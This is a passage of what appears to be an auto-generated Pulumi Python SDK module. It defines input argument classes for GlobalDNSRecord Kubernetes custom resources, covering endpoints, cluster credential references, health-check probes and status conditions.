'GlobalDNSZoneSpecProviderRoute53CredentialsSecretRefArgs',
'GlobalDNSZoneStatusArgs',
'GlobalDNSZoneStatusConditionsArgs',
'GlobalRouteDiscoverySpecArgs',
'GlobalRouteDiscoverySpecClustersArgs',
'GlobalRouteDiscoverySpecClustersClusterCredentialRefArgs',
'GlobalRouteDiscoverySpecGlobalZoneRefArgs',
'GlobalRouteDiscoverySpecRouteSelectorArgs',
'GlobalRouteDiscoverySpecRouteSelectorMatchExpressionsArgs',
'GlobalRouteDiscoveryStatusArgs',
'GlobalRouteDiscoveryStatusClusterReferenceStatusesArgs',
'GlobalRouteDiscoveryStatusConditionsArgs',
]
@pulumi.input_type
class GlobalDNSRecordSpecArgs:
def __init__(__self__, *,
global_zone_ref: pulumi.Input['GlobalDNSRecordSpecGlobalZoneRefArgs'],
load_balancing_policy: pulumi.Input[str],
name: pulumi.Input[str],
endpoints: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecEndpointsArgs']]]] = None,
health_check: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckArgs']] = None,
ttl: Optional[pulumi.Input[int]] = None):
"""
GlobalDNSRecordSpec defines the desired state of GlobalDNSRecord
:param pulumi.Input['GlobalDNSRecordSpecGlobalZoneRefArgs'] global_zone_ref: GlobalZoneRef represents the global zone that will be used to host this record
:param pulumi.Input[str] load_balancing_policy: LoadBalancingPolicy describes the policy used to loadbalance the results of the DNS queries.
:param pulumi.Input[str] name: Name is the fqdn that will be used for this record.
:param pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecEndpointsArgs']]] endpoints: Enpoints is the list of the cluster endpoitns that need to be considered for this dns record
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckArgs'] health_check: Probe is the health check used to probe the health of the applications and decide which IPs to return Only HttpAction is supported
:param pulumi.Input[int] ttl: TTL is the TTL for this dns record kubebuilder:default:60
"""
pulumi.set(__self__, "global_zone_ref", global_zone_ref)
pulumi.set(__self__, "load_balancing_policy", load_balancing_policy)
pulumi.set(__self__, "name", name)
if endpoints is not None:
pulumi.set(__self__, "endpoints", endpoints)
if health_check is not None:
pulumi.set(__self__, "health_check", health_check)
if ttl is not None:
pulumi.set(__self__, "ttl", ttl)
@property
@pulumi.getter(name="globalZoneRef")
def global_zone_ref(self) -> pulumi.Input['GlobalDNSRecordSpecGlobalZoneRefArgs']:
"""
GlobalZoneRef represents the global zone that will be used to host this record
"""
return pulumi.get(self, "global_zone_ref")
@global_zone_ref.setter
def global_zone_ref(self, value: pulumi.Input['GlobalDNSRecordSpecGlobalZoneRefArgs']):
pulumi.set(self, "global_zone_ref", value)
@property
@pulumi.getter(name="loadBalancingPolicy")
def load_balancing_policy(self) -> pulumi.Input[str]:
"""
LoadBalancingPolicy describes the policy used to loadbalance the results of the DNS queries.
"""
return pulumi.get(self, "load_balancing_policy")
@load_balancing_policy.setter
def load_balancing_policy(self, value: pulumi.Input[str]):
pulumi.set(self, "load_balancing_policy", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name is the fqdn that will be used for this record.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def endpoints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecEndpointsArgs']]]]:
"""
Enpoints is the list of the cluster endpoitns that need to be considered for this dns record
"""
return pulumi.get(self, "endpoints")
@endpoints.setter
def endpoints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecEndpointsArgs']]]]):
pulumi.set(self, "endpoints", value)
@property
@pulumi.getter(name="healthCheck")
def health_check(self) -> Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckArgs']]:
"""
Probe is the health check used to probe the health of the applications and decide which IPs to return Only HttpAction is supported
"""
return pulumi.get(self, "health_check")
@health_check.setter
def health_check(self, value: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckArgs']]):
pulumi.set(self, "health_check", value)
@property
@pulumi.getter
def ttl(self) -> Optional[pulumi.Input[int]]:
"""
TTL is the TTL for this dns record kubebuilder:default:60
"""
return pulumi.get(self, "ttl")
@ttl.setter
def ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl", value)
@pulumi.input_type
class GlobalDNSRecordSpecEndpointsArgs:
def __init__(__self__, *,
cluster_credential_ref: pulumi.Input['GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs'],
cluster_name: pulumi.Input[str],
load_balancer_service_ref: pulumi.Input['GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs']):
"""
Endpoint represents a traffic ingress point to the cluster. Currently only LoadBalancer service is supported.
:param pulumi.Input['GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs'] cluster_credential_ref: CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
:param pulumi.Input[str] cluster_name: ClusterName name of the cluster to connect to.
:param pulumi.Input['GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs'] load_balancer_service_ref: LoadBalancerServiceRef contains a reference to the load balancer service that will receive the traffic, if using a router, put here the service created by the ingress controller.
"""
pulumi.set(__self__, "cluster_credential_ref", cluster_credential_ref)
pulumi.set(__self__, "cluster_name", cluster_name)
pulumi.set(__self__, "load_balancer_service_ref", load_balancer_service_ref)
@property
@pulumi.getter(name="clusterCredentialRef")
def cluster_credential_ref(self) -> pulumi.Input['GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs']:
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
"""
return pulumi.get(self, "cluster_credential_ref")
@cluster_credential_ref.setter
def cluster_credential_ref(self, value: pulumi.Input['GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs']):
pulumi.set(self, "cluster_credential_ref", value)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Input[str]:
"""
ClusterName name of the cluster to connect to.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="loadBalancerServiceRef")
def load_balancer_service_ref(self) -> pulumi.Input['GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs']:
"""
LoadBalancerServiceRef contains a reference to the load balancer service that will receive the traffic, if using a router, put here the service created by the ingress controller.
"""
return pulumi.get(self, "load_balancer_service_ref")
@load_balancer_service_ref.setter
def load_balancer_service_ref(self, value: pulumi.Input['GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs']):
pulumi.set(self, "load_balancer_service_ref", value)
@pulumi.input_type
class GlobalDNSRecordSpecEndpointsClusterCredentialRefArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str]):
"""
CredentialsSecretRef is a reference to a secret containing the credentials to access the cluster a key called "kubeconfig" containing a valid kubeconfig file for connecting to the cluster must exist in this secret.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class GlobalDNSRecordSpecEndpointsLoadBalancerServiceRefArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
namespace: pulumi.Input[str]):
"""
LoadBalancerServiceRef contains a reference to the load balancer service that will receive the traffic, if using a router, put here the service created by the ingress controller.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class GlobalDNSRecordSpecGlobalZoneRefArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None):
"""
GlobalZoneRef represents the global zone that will be used to host this record
:param pulumi.Input[str] name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckArgs:
def __init__(__self__, *,
exec_: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckExecArgs']] = None,
failure_threshold: Optional[pulumi.Input[int]] = None,
http_get: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetArgs']] = None,
initial_delay_seconds: Optional[pulumi.Input[int]] = None,
period_seconds: Optional[pulumi.Input[int]] = None,
success_threshold: Optional[pulumi.Input[int]] = None,
tcp_socket: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketArgs']] = None,
timeout_seconds: Optional[pulumi.Input[int]] = None):
"""
Probe is the health check used to probe the health of the applications and decide which IPs to return Only HttpAction is supported
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckExecArgs'] exec_: One and only one of the following should be specified. Exec specifies the action to take.
:param pulumi.Input[int] failure_threshold: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1.
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetArgs'] http_get: HTTPGet specifies the http request to perform.
:param pulumi.Input[int] initial_delay_seconds: Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes
:param pulumi.Input[int] period_seconds: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1.
:param pulumi.Input[int] success_threshold: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1.
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketArgs'] tcp_socket: TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook
:param pulumi.Input[int] timeout_seconds: Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes
"""
if exec_ is not None:
pulumi.set(__self__, "exec_", exec_)
if failure_threshold is not None:
pulumi.set(__self__, "failure_threshold", failure_threshold)
if http_get is not None:
pulumi.set(__self__, "http_get", http_get)
if initial_delay_seconds is not None:
pulumi.set(__self__, "initial_delay_seconds", initial_delay_seconds)
if period_seconds is not None:
pulumi.set(__self__, "period_seconds", period_seconds)
if success_threshold is not None:
pulumi.set(__self__, "success_threshold", success_threshold)
if tcp_socket is not None:
pulumi.set(__self__, "tcp_socket", tcp_socket)
if timeout_seconds is not None:
pulumi.set(__self__, "timeout_seconds", timeout_seconds)
@property
@pulumi.getter(name="exec")
def exec_(self) -> Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckExecArgs']]:
"""
One and only one of the following should be specified. Exec specifies the action to take.
"""
return pulumi.get(self, "exec_")
@exec_.setter
def exec_(self, value: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckExecArgs']]):
pulumi.set(self, "exec_", value)
@property
@pulumi.getter(name="failureThreshold")
def failure_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1.
"""
return pulumi.get(self, "failure_threshold")
@failure_threshold.setter
def failure_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_threshold", value)
@property
@pulumi.getter(name="httpGet")
def http_get(self) -> Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetArgs']]:
"""
HTTPGet specifies the http request to perform.
"""
return pulumi.get(self, "http_get")
@http_get.setter
def http_get(self, value: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetArgs']]):
pulumi.set(self, "http_get", value)
@property
@pulumi.getter(name="initialDelaySeconds")
def initial_delay_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes
"""
return pulumi.get(self, "initial_delay_seconds")
@initial_delay_seconds.setter
def initial_delay_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "initial_delay_seconds", value)
@property
@pulumi.getter(name="periodSeconds")
def period_seconds(self) -> Optional[pulumi.Input[int]]:
"""
How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1.
"""
return pulumi.get(self, "period_seconds")
@period_seconds.setter
def period_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "period_seconds", value)
@property
@pulumi.getter(name="successThreshold")
def success_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1.
"""
return pulumi.get(self, "success_threshold")
@success_threshold.setter
def success_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "success_threshold", value)
@property
@pulumi.getter(name="tcpSocket")
def tcp_socket(self) -> Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketArgs']]:
"""
TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook
"""
return pulumi.get(self, "tcp_socket")
@tcp_socket.setter
def tcp_socket(self, value: Optional[pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketArgs']]):
pulumi.set(self, "tcp_socket", value)
@property
@pulumi.getter(name="timeoutSeconds")
def timeout_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes
"""
return pulumi.get(self, "timeout_seconds")
@timeout_seconds.setter
def timeout_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout_seconds", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckExecArgs:
def __init__(__self__, *,
command: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
One and only one of the following should be specified. Exec specifies the action to take.
:param pulumi.Input[Sequence[pulumi.Input[str]]] command: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy.
"""
if command is not None:
pulumi.set(__self__, "command", command)
@property
@pulumi.getter
def command(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy.
"""
return pulumi.get(self, "command")
@command.setter
def command(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "command", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckHttpGetArgs:
def __init__(__self__, *,
port: pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetPortArgs'],
host: Optional[pulumi.Input[str]] = None,
http_headers: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs']]]] = None,
path: Optional[pulumi.Input[str]] = None,
scheme: Optional[pulumi.Input[str]] = None):
"""
HTTPGet specifies the http request to perform.
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetPortArgs'] port: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME.
:param pulumi.Input[str] host: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead.
:param pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs']]] http_headers: Custom headers to set in the request. HTTP allows repeated headers.
:param pulumi.Input[str] path: Path to access on the HTTP server.
:param pulumi.Input[str] scheme: Scheme to use for connecting to the host. Defaults to HTTP.
"""
pulumi.set(__self__, "port", port)
if host is not None:
pulumi.set(__self__, "host", host)
if http_headers is not None:
pulumi.set(__self__, "http_headers", http_headers)
if path is not None:
pulumi.set(__self__, "path", path)
if scheme is not None:
pulumi.set(__self__, "scheme", scheme)
@property
@pulumi.getter
def port(self) -> pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetPortArgs']:
"""
Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetPortArgs']):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="httpHeaders")
def http_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs']]]]:
"""
Custom headers to set in the request. HTTP allows repeated headers.
"""
return pulumi.get(self, "http_headers")
@http_headers.setter
def http_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs']]]]):
pulumi.set(self, "http_headers", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
Path to access on the HTTP server.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def scheme(self) -> Optional[pulumi.Input[str]]:
"""
Scheme to use for connecting to the host. Defaults to HTTP.
"""
return pulumi.get(self, "scheme")
@scheme.setter
def scheme(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scheme", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckHttpGetHttpHeadersArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
value: pulumi.Input[str]):
"""
HTTPHeader describes a custom header to be used in HTTP probes
:param pulumi.Input[str] name: The header field name
:param pulumi.Input[str] value: The header field value
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The header field name
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The header field value
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckHttpGetPortArgs:
def __init__(__self__):
pass
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckTcpSocketArgs:
def __init__(__self__, *,
port: pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs'],
host: Optional[pulumi.Input[str]] = None):
"""
TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook
:param pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs'] port: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME.
:param pulumi.Input[str] host: Optional: Host name to connect to, defaults to the pod IP.
"""
pulumi.set(__self__, "port", port)
if host is not None:
pulumi.set(__self__, "host", host)
@property
@pulumi.getter
def port(self) -> pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs']:
"""
Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input['GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs']):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
Optional: Host name to connect to, defaults to the pod IP.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@pulumi.input_type
class GlobalDNSRecordSpecHealthCheckTcpSocketPortArgs:
def __init__(__self__):
pass
@pulumi.input_type
class GlobalDNSRecordStatusArgs:
def __init__(__self__, *,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusConditionsArgs']]]] = None,
endpoint_statuses: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusEndpointStatusesArgs']]]]]] = None,
monitored_service_statuses: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusMonitoredServiceStatusesArgs']]]]]] = None,
provider_status: Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusArgs']] = None):
"""
GlobalDNSRecordStatus defines the observed state of GlobalDNSRecord
:param pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusConditionsArgs']]] conditions: ReconcileStatus this is the general status of the main reconciler
:param pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusEndpointStatusesArgs']]]]] endpoint_statuses: EndpointStatuses contains the status of the endpoint as they were looked up during the latest reconcile. We don't fail when an endpoint look up fails, but we need to tarck its status.
:param pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusMonitoredServiceStatusesArgs']]]]] monitored_service_statuses: MonitoredServiceStatuses contains the reconcile status of each of the monitored services in the remote clusters
:param pulumi.Input['GlobalDNSRecordStatusProviderStatusArgs'] provider_status: ProviderStatus contains provider specific status information
"""
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if endpoint_statuses is not None:
pulumi.set(__self__, "endpoint_statuses", endpoint_statuses)
if monitored_service_statuses is not None:
pulumi.set(__self__, "monitored_service_statuses", monitored_service_statuses)
if provider_status is not None:
pulumi.set(__self__, "provider_status", provider_status)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusConditionsArgs']]]]:
"""
ReconcileStatus this is the general status of the main reconciler
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusConditionsArgs']]]]):
pulumi.set(self, "conditions", value)
@property
@pulumi.getter(name="endpointStatuses")
def endpoint_statuses(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusEndpointStatusesArgs']]]]]]:
"""
EndpointStatuses contains the status of the endpoint as they were looked up during the latest reconcile. We don't fail when an endpoint look up fails, but we need to tarck its status.
"""
return pulumi.get(self, "endpoint_statuses")
@endpoint_statuses.setter
def endpoint_statuses(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusEndpointStatusesArgs']]]]]]):
pulumi.set(self, "endpoint_statuses", value)
@property
@pulumi.getter(name="monitoredServiceStatuses")
def monitored_service_statuses(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusMonitoredServiceStatusesArgs']]]]]]:
"""
MonitoredServiceStatuses contains the reconcile status of each of the monitored services in the remote clusters
"""
return pulumi.get(self, "monitored_service_statuses")
@monitored_service_statuses.setter
def monitored_service_statuses(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input['GlobalDNSRecordStatusMonitoredServiceStatusesArgs']]]]]]):
pulumi.set(self, "monitored_service_statuses", value)
@property
@pulumi.getter(name="providerStatus")
def provider_status(self) -> Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusArgs']]:
"""
ProviderStatus contains provider specific status information
"""
return pulumi.get(self, "provider_status")
@provider_status.setter
def provider_status(self, value: Optional[pulumi.Input['GlobalDNSRecordStatusProviderStatusArgs']]):
pulumi.set(self, "provider_status", value)
@pulumi.input_type
class GlobalDNSRecordStatusConditionsArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@pulumi.input_type
class GlobalDNSRecordStatusEndpointStatusesArgs:
def __init__(__self__, *,
status: pulumi.Input[str],
type: pulumi.Input[str],
last_transition_time: Optional[pulumi.Input[str]] = None,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None):
"""
Condition represents an observation of an object's state. Conditions are an extension mechanism intended to be used when the details of an observation are not a priori known or would not apply to all instances of a given Kind.
Conditions should be added to explicitly convey properties that users and components care about rather than requiring those properties to be inferred from other observations. Once defined, the meaning of a Condition can not be changed arbitrarily - it becomes part of the API, and has the same backwards- and forwards-compatibility concerns of any other part of the API.
:param pulumi.Input[str] type: ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
:param pulumi.Input[str] reason: ConditionReason is intended to be a one-word, CamelCase representation of the category of cause of the current status. It is intended to be used in concise output, such as one-line kubectl get output, and in summarizing occurrences of causes.
"""
pulumi.set(__self__, "status", status)
pulumi.set(__self__, "type", type)
if last_transition_time is not None:
pulumi.set(__self__, "last_transition_time", last_transition_time)
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
@property
@pulumi.getter
def status(self) -> pulumi.Input[str]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: pulumi.Input[str]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
ConditionType is the type of the condition and is typically a CamelCased word or short phrase.
Condition types should indicate state in the "abnormal-true" polarity. For example, if the condition indicates when a policy is invalid, the "is valid" case is probably the norm, so the condition should be called "Invalid".
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="lastTransitionTime")
def last_transition_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "last_transition_time")
@last_transition_time.setter
def last_transition_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_transition_time", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
"""
